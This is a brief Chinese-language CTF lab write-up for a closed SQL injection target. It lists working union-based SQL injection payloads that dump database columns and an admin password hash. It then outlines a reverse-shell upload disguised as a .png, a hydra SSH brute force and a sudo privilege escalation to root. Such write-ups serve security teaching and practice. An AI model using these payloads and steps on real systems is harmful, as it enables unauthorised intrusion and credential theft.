模块C CTF 夺旗-攻击
C 模块-场景说明:
√ 服务器场景:SQLi20231004
√ 服务器场景操作系统:未知(封闭靶机)
√ 用户名:未知 密码:未知
C 模块服务器场景说明:
靶机地址范围 172.16.10.0-172.16.10.255
Flag 位置 Linux:/root/flagvalue.txt Windows:C:/flagvalue.txt
环境 学习交流+私信
试闭合,找注入点
1' union select 1,2,3 -- -
查库
1' union select 1,database(),3 -- -
然后就是正常的数据库注入
1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='sqlgunnews' and table_name='admin' -- -
查密码
1' union select 1,password,3 from admin -- -
21232f297a57a5a743894a0e4a801fc3
http://ip/sqlgunadmin/login.php
用户名admin密码admin登录进去
生成并上传反弹木马
改后缀为.png
打开burpsuite抓包
开启后点击确定上传
改为.php
在HTTP history里找到刚才上传的php
设置好模块和参数
执行exploit后在浏览器访问链接
用hydra跑ubuntu的密码
ssh连接
发现ubuntu权限ALL
更改root密码,切换到root用户,然后拿flag